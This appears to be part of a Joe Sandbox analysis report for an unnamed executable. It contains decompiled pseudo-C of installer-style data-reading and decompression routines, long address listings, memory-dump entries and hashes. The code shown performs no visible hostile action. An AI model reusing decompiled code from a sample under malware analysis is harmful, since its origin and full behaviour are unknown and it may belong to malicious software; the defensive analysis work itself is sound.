                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                                                            												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                                            													break;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__edx =  *(__ebp - 8);
                                                                                                                                                                                                                            												__cl =  *(__eax + __edx);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            												 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                                                            												 *(__eax + __edx) = __cl;
                                                                                                                                                                                                                            												__eax = __eax + 1;
                                                                                                                                                                                                                            												__edx = 0;
                                                                                                                                                                                                                            												_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                                            												__edx = _t414;
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x68);
                                                                                                                                                                                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x30);
                                                                                                                                                                                                                            												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                                                                            												 *(__ebp - 0x14) = _t414;
                                                                                                                                                                                                                            												if( *(__ebp - 0x30) > 0) {
                                                                                                                                                                                                                            													continue;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													L80:
                                                                                                                                                                                                                            													 *(__ebp - 0x88) = 2;
                                                                                                                                                                                                                            													goto L1;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											 *(__ebp - 0x88) = 0x1c;
                                                                                                                                                                                                                            											goto L170;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								L171:
                                                                                                                                                                                                                            								_t535 = _t534 | 0xffffffff;
                                                                                                                                                                                                                            								goto L172;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040741c
                                                                                                                                                                                                                            0x00407420
                                                                                                                                                                                                                            0x004075cf
                                                                                                                                                                                                                            0x004075e5
                                                                                                                                                                                                                            0x004075ed
                                                                                                                                                                                                                            0x004075f4
                                                                                                                                                                                                                            0x004075f6
                                                                                                                                                                                                                            0x004075fd
                                                                                                                                                                                                                            0x00407601
                                                                                                                                                                                                                            0x00407601
                                                                                                                                                                                                                            0x0040742c
                                                                                                                                                                                                                            0x00407433
                                                                                                                                                                                                                            0x0040743b
                                                                                                                                                                                                                            0x0040743e
                                                                                                                                                                                                                            0x00407441
                                                                                                                                                                                                                            0x00407441
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00406be3
                                                                                                                                                                                                                            0x00406be3
                                                                                                                                                                                                                            0x00406be3
                                                                                                                                                                                                                            0x00406bec
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406bf2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406bfd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c06
                                                                                                                                                                                                                            0x00406c09
                                                                                                                                                                                                                            0x00406c0c
                                                                                                                                                                                                                            0x00406c10
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c16
                                                                                                                                                                                                                            0x00406c19
                                                                                                                                                                                                                            0x00406c1b
                                                                                                                                                                                                                            0x00406c1c
                                                                                                                                                                                                                            0x00406c1f
                                                                                                                                                                                                                            0x00406c21
                                                                                                                                                                                                                            0x00406c22
                                                                                                                                                                                                                            0x00406c24
                                                                                                                                                                                                                            0x00406c27
                                                                                                                                                                                                                            0x00406c2c
                                                                                                                                                                                                                            0x00406c31
                                                                                                                                                                                                                            0x00406c3a
                                                                                                                                                                                                                            0x00406c4d
                                                                                                                                                                                                                            0x00406c50
                                                                                                                                                                                                                            0x00406c5c
                                                                                                                                                                                                                            0x00406c84
                                                                                                                                                                                                                            0x00406c86
                                                                                                                                                                                                                            0x00406c94
                                                                                                                                                                                                                            0x00406c94
                                                                                                                                                                                                                            0x00406c98
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c88
                                                                                                                                                                                                                            0x00406c88
                                                                                                                                                                                                                            0x00406c8b
                                                                                                                                                                                                                            0x00406c8c
                                                                                                                                                                                                                            0x00406c8c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c88
                                                                                                                                                                                                                            0x00406c62
                                                                                                                                                                                                                            0x00406c67
                                                                                                                                                                                                                            0x00406c67
                                                                                                                                                                                                                            0x00406c70
                                                                                                                                                                                                                            0x00406c78
                                                                                                                                                                                                                            0x00406c7b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c81
                                                                                                                                                                                                                            0x00406c81
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c81
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c9e
                                                                                                                                                                                                                            0x00406c9e
                                                                                                                                                                                                                            0x00406ca2
                                                                                                                                                                                                                            0x0040754e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040754e
                                                                                                                                                                                                                            0x00406cab
                                                                                                                                                                                                                            0x00406cbb
                                                                                                                                                                                                                            0x00406cbe
                                                                                                                                                                                                                            0x00406cc1
                                                                                                                                                                                                                            0x00406cc1
                                                                                                                                                                                                                            0x00406cc1
                                                                                                                                                                                                                            0x00406cc4
                                                                                                                                                                                                                            0x00406cc8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406cca
                                                                                                                                                                                                                            0x00406cd0
                                                                                                                                                                                                                            0x00406cfa
                                                                                                                                                                                                                            0x00406d00
                                                                                                                                                                                                                            0x00406d07
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d07
                                                                                                                                                                                                                            0x00406cd6
                                                                                                                                                                                                                            0x00406cd9
                                                                                                                                                                                                                            0x00406cde
                                                                                                                                                                                                                            0x00406cde
                                                                                                                                                                                                                            0x00406ce9
                                                                                                                                                                                                                            0x00406cf1
                                                                                                                                                                                                                            0x00406cf4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d39
                                                                                                                                                                                                                            0x00406d3f
                                                                                                                                                                                                                            0x00406d42
                                                                                                                                                                                                                            0x00406d4f
                                                                                                                                                                                                                            0x00406d57
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x00407122
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407143
                                                                                                                                                                                                                            0x00407147
                                                                                                                                                                                                                            0x0040714e
                                                                                                                                                                                                                            0x00407151
                                                                                                                                                                                                                            0x00407154
                                                                                                                                                                                                                            0x00407149
                                                                                                                                                                                                                            0x00407149
                                                                                                                                                                                                                            0x00407149
                                                                                                                                                                                                                            0x00407157
                                                                                                                                                                                                                            0x0040715a
                                                                                                                                                                                                                            0x0040715d
                                                                                                                                                                                                                            0x0040715d
                                                                                                                                                                                                                            0x00407160
                                                                                                                                                                                                                            0x00407163
                                                                                                                                                                                                                            0x00407166
                                                                                                                                                                                                                            0x00407166
                                                                                                                                                                                                                            0x00407169
                                                                                                                                                                                                                            0x00407170
                                                                                                                                                                                                                            0x00407175
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407203
                                                                                                                                                                                                                            0x00407203
                                                                                                                                                                                                                            0x00407207
                                                                                                                                                                                                                            0x004075a5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075a5
                                                                                                                                                                                                                            0x0040720d
                                                                                                                                                                                                                            0x00407210
                                                                                                                                                                                                                            0x00407213
                                                                                                                                                                                                                            0x00407217
                                                                                                                                                                                                                            0x0040721a
                                                                                                                                                                                                                            0x00407220
                                                                                                                                                                                                                            0x00407222
                                                                                                                                                                                                                            0x00407222
                                                                                                                                                                                                                            0x00407222
                                                                                                                                                                                                                            0x00407225
                                                                                                                                                                                                                            0x00407228
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406df8
                                                                                                                                                                                                                            0x00406df8
                                                                                                                                                                                                                            0x00406dfc
                                                                                                                                                                                                                            0x00407569
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407569
                                                                                                                                                                                                                            0x00406e02
                                                                                                                                                                                                                            0x00406e05
                                                                                                                                                                                                                            0x00406e08
                                                                                                                                                                                                                            0x00406e0c
                                                                                                                                                                                                                            0x00406e0f
                                                                                                                                                                                                                            0x00406e15
                                                                                                                                                                                                                            0x00406e17
                                                                                                                                                                                                                            0x00406e17
                                                                                                                                                                                                                            0x00406e17
                                                                                                                                                                                                                            0x00406e1a
                                                                                                                                                                                                                            0x00406e1d
                                                                                                                                                                                                                            0x00406e1d
                                                                                                                                                                                                                            0x00406e20
                                                                                                                                                                                                                            0x00406e23
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406e29
                                                                                                                                                                                                                            0x00406e2f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406e35
                                                                                                                                                                                                                            0x00406e35
                                                                                                                                                                                                                            0x00406e39
                                                                                                                                                                                                                            0x00406e3c
                                                                                                                                                                                                                            0x00406e3f
                                                                                                                                                                                                                            0x00406e42
                                                                                                                                                                                                                            0x00406e45
                                                                                                                                                                                                                            0x00406e46
                                                                                                                                                                                                                            0x00406e49
                                                                                                                                                                                                                            0x00406e4b
                                                                                                                                                                                                                            0x00406e51
                                                                                                                                                                                                                            0x00406e54
                                                                                                                                                                                                                            0x00406e57
                                                                                                                                                                                                                            0x00406e5a
                                                                                                                                                                                                                            0x00406e5d
                                                                                                                                                                                                                            0x00406e60
                                                                                                                                                                                                                            0x00406e63
                                                                                                                                                                                                                            0x00406e7f
                                                                                                                                                                                                                            0x00406e82
                                                                                                                                                                                                                            0x00406e85
                                                                                                                                                                                                                            0x00406e88
                                                                                                                                                                                                                            0x00406e8f
                                                                                                                                                                                                                            0x00406e93
                                                                                                                                                                                                                            0x00406e95
                                                                                                                                                                                                                            0x00406e99
                                                                                                                                                                                                                            0x00406e65
                                                                                                                                                                                                                            0x00406e65
                                                                                                                                                                                                                            0x00406e69
                                                                                                                                                                                                                            0x00406e71
                                                                                                                                                                                                                            0x00406e76
                                                                                                                                                                                                                            0x00406e78
                                                                                                                                                                                                                            0x00406e7a
                                                                                                                                                                                                                            0x00406e7a
                                                                                                                                                                                                                            0x00406e9c
                                                                                                                                                                                                                            0x00406ea3
                                                                                                                                                                                                                            0x00406ea6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406eac
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406eac
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406eb1
                                                                                                                                                                                                                            0x00406eb1
                                                                                                                                                                                                                            0x00406eb5
                                                                                                                                                                                                                            0x00407575
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407575
                                                                                                                                                                                                                            0x00406ebb
                                                                                                                                                                                                                            0x00406ebe
                                                                                                                                                                                                                            0x00406ec1
                                                                                                                                                                                                                            0x00407456
                                                                                                                                                                                                                            0x00407474
                                                                                                                                                                                                                            0x00407474
                                                                                                                                                                                                                            0x00407474
                                                                                                                                                                                                                            0x0040747b
                                                                                                                                                                                                                            0x00407482
                                                                                                                                                                                                                            0x00407489
                                                                                                                                                                                                                            0x00407489
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407489
                                                                                                                                                                                                                            0x00407458
                                                                                                                                                                                                                            0x0040745b
                                                                                                                                                                                                                            0x0040745e
                                                                                                                                                                                                                            0x00407461
                                                                                                                                                                                                                            0x00407468
                                                                                                                                                                                                                            0x004073ac
                                                                                                                                                                                                                            0x004073ac
                                                                                                                                                                                                                            0x004073af
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407543
                                                                                                                                                                                                                            0x00407546
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040717d
                                                                                                                                                                                                                            0x0040717f
                                                                                                                                                                                                                            0x00407186
                                                                                                                                                                                                                            0x00407187
                                                                                                                                                                                                                            0x00407189
                                                                                                                                                                                                                            0x0040718c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407194
                                                                                                                                                                                                                            0x00407197
                                                                                                                                                                                                                            0x0040719a
                                                                                                                                                                                                                            0x0040719c
                                                                                                                                                                                                                            0x0040719e
                                                                                                                                                                                                                            0x0040719e
                                                                                                                                                                                                                            0x0040719f
                                                                                                                                                                                                                            0x004071a2
                                                                                                                                                                                                                            0x004071a9
                                                                                                                                                                                                                            0x004071ac
                                                                                                                                                                                                                            0x004071ba
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407490
                                                                                                                                                                                                                            0x00407490
                                                                                                                                                                                                                            0x00407493
                                                                                                                                                                                                                            0x0040749a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040749f
                                                                                                                                                                                                                            0x0040749f
                                                                                                                                                                                                                            0x004074a3
                                                                                                                                                                                                                            0x004075db
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075db
                                                                                                                                                                                                                            0x004074a9
                                                                                                                                                                                                                            0x004074ac
                                                                                                                                                                                                                            0x004074af
                                                                                                                                                                                                                            0x004074b3
                                                                                                                                                                                                                            0x004074b6
                                                                                                                                                                                                                            0x004074bc
                                                                                                                                                                                                                            0x004074be
                                                                                                                                                                                                                            0x004074be
                                                                                                                                                                                                                            0x004074be
                                                                                                                                                                                                                            0x004074c1
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c7
                                                                                                                                                                                                                            0x004074c7
                                                                                                                                                                                                                            0x004074cb
                                                                                                                                                                                                                            0x0040752b
                                                                                                                                                                                                                            0x0040752e
                                                                                                                                                                                                                            0x00407533
                                                                                                                                                                                                                            0x00407534
                                                                                                                                                                                                                            0x00407536
                                                                                                                                                                                                                            0x00407538
                                                                                                                                                                                                                            0x0040753b
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040744d
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x004074cd
                                                                                                                                                                                                                            0x004074d3
                                                                                                                                                                                                                            0x004074d6
                                                                                                                                                                                                                            0x004074d9
                                                                                                                                                                                                                            0x004074dc
                                                                                                                                                                                                                            0x004074df
                                                                                                                                                                                                                            0x004074e2
                                                                                                                                                                                                                            0x004074e5
                                                                                                                                                                                                                            0x004074e8
                                                                                                                                                                                                                            0x004074eb
                                                                                                                                                                                                                            0x004074ee
                                                                                                                                                                                                                            0x00407507
                                                                                                                                                                                                                            0x0040750a
                                                                                                                                                                                                                            0x0040750d
                                                                                                                                                                                                                            0x00407510
                                                                                                                                                                                                                            0x00407514
                                                                                                                                                                                                                            0x00407516
                                                                                                                                                                                                                            0x00407516
                                                                                                                                                                                                                            0x00407517
                                                                                                                                                                                                                            0x0040751a
                                                                                                                                                                                                                            0x004074f0
                                                                                                                                                                                                                            0x004074f0
                                                                                                                                                                                                                            0x004074f8
                                                                                                                                                                                                                            0x004074fd
                                                                                                                                                                                                                            0x004074ff
                                                                                                                                                                                                                            0x00407502
                                                                                                                                                                                                                            0x00407502
                                                                                                                                                                                                                            0x0040751d
                                                                                                                                                                                                                            0x00407524
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407526
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407526
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004070cf
                                                                                                                                                                                                                            0x004070cf
                                                                                                                                                                                                                            0x004070d3
                                                                                                                                                                                                                            0x00407599
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407599
                                                                                                                                                                                                                            0x004070d9
                                                                                                                                                                                                                            0x004070dc
                                                                                                                                                                                                                            0x004070df
                                                                                                                                                                                                                            0x004070e2
                                                                                                                                                                                                                            0x004070e4
                                                                                                                                                                                                                            0x004070e4
                                                                                                                                                                                                                            0x004070e4
                                                                                                                                                                                                                            0x004070e7
                                                                                                                                                                                                                            0x004070ea
                                                                                                                                                                                                                            0x004070ed
                                                                                                                                                                                                                            0x004070f0
                                                                                                                                                                                                                            0x004070f3
                                                                                                                                                                                                                            0x004070f6
                                                                                                                                                                                                                            0x004070f7
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070fc
                                                                                                                                                                                                                            0x004070ff
                                                                                                                                                                                                                            0x00407102
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407108
                                                                                                                                                                                                                            0x0040710a
                                                                                                                                                                                                                            0x0040710a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x00407350
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407356
                                                                                                                                                                                                                            0x00407359
                                                                                                                                                                                                                            0x0040735c
                                                                                                                                                                                                                            0x0040735f
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407364
                                                                                                                                                                                                                            0x00407367
                                                                                                                                                                                                                            0x0040736a
                                                                                                                                                                                                                            0x0040736d
                                                                                                                                                                                                                            0x00407370
                                                                                                                                                                                                                            0x00407373
                                                                                                                                                                                                                            0x00407374
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407379
                                                                                                                                                                                                                            0x0040737c
                                                                                                                                                                                                                            0x0040737f
                                                                                                                                                                                                                            0x00407382
                                                                                                                                                                                                                            0x00407385
                                                                                                                                                                                                                            0x00407389
                                                                                                                                                                                                                            0x0040738b
                                                                                                                                                                                                                            0x0040738e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407390
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x0040738e
                                                                                                                                                                                                                            0x004075c3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406bf2
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x004073ce
                                                                                                                                                                                                                            0x004073cb

                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                                                                                                                                                            • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                            			E00403479(intOrPtr _a4) {
                                                                                                                                                                                                                            				intOrPtr _t10;
                                                                                                                                                                                                                            				intOrPtr _t11;
                                                                                                                                                                                                                            				signed int _t12;
                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                            				long _t16;
                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                            				intOrPtr _t19;
                                                                                                                                                                                                                            				intOrPtr _t31;
                                                                                                                                                                                                                            				long _t32;
                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                            				intOrPtr _t36;
                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t32 =  *0x420ef4; // 0x66cde
                                                                                                                                                                                                                            				_t34 = _t32 -  *0x40ce60 + _a4;
                                                                                                                                                                                                                            				 *0x42a26c = GetTickCount() + 0x1f4;
                                                                                                                                                                                                                            				if(_t34 <= 0) {
                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                            					E0040302E(1);
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E004035F8( *0x420f04);
                                                                                                                                                                                                                            				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
                                                                                                                                                                                                                            				 *0x420f00 = _t34;
                                                                                                                                                                                                                            				 *0x420ef0 = 0;
                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                            					_t10 =  *0x420ef8; // 0x79b3d
                                                                                                                                                                                                                            					_t31 = 0x4000;
                                                                                                                                                                                                                            					_t11 = _t10 -  *0x420f04;
                                                                                                                                                                                                                            					if(_t11 <= 0x4000) {
                                                                                                                                                                                                                            						_t31 = _t11;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t12 = E004035E2(0x414ef0, _t31);
                                                                                                                                                                                                                            					if(_t12 == 0) {
                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					 *0x420f04 =  *0x420f04 + _t31;
                                                                                                                                                                                                                            					 *0x40ce80 = 0x414ef0;
                                                                                                                                                                                                                            					 *0x40ce84 = _t31;
                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                            					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
                                                                                                                                                                                                                            						_t19 =  *0x420f00; // 0x5cfce
                                                                                                                                                                                                                            						 *0x420ef0 = _t19 -  *0x420ef4 - _a4 +  *0x40ce60;
                                                                                                                                                                                                                            						E0040302E(0);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					 *0x40ce88 = 0x40cef0;
                                                                                                                                                                                                                            					 *0x40ce8c = 0x8000; // executed
                                                                                                                                                                                                                            					_t14 = E00406BB0(0x40ce68); // executed
                                                                                                                                                                                                                            					if(_t14 < 0) {
                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t36 =  *0x40ce88; // 0x40d704
                                                                                                                                                                                                                            					_t37 = _t36 - 0x40cef0;
                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                            						__eflags =  *0x40ce84; // 0x0
                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                            							goto L20;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eflags = _t31;
                                                                                                                                                                                                                            						if(_t31 == 0) {
                                                                                                                                                                                                                            							goto L20;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                            						_t16 =  *0x420ef4; // 0x66cde
                                                                                                                                                                                                                            						if(_t16 -  *0x40ce60 + _a4 > 0) {
                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
                                                                                                                                                                                                                            					if(_t18 == 0) {
                                                                                                                                                                                                                            						_push(0xfffffffe);
                                                                                                                                                                                                                            						L21:
                                                                                                                                                                                                                            						_pop(_t15);
                                                                                                                                                                                                                            						return _t15;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					 *0x40ce60 =  *0x40ce60 + _t37;
                                                                                                                                                                                                                            					_t49 =  *0x40ce84; // 0x0
                                                                                                                                                                                                                            					if(_t49 != 0) {
                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L16;
                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                            					_push(0xfffffffd);
                                                                                                                                                                                                                            					goto L21;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t12 | 0xffffffff;
                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004035cc
                                                                                                                                                                                                                            0x004035cc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004035cc
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040348D
                                                                                                                                                                                                                              • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00066CDE,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
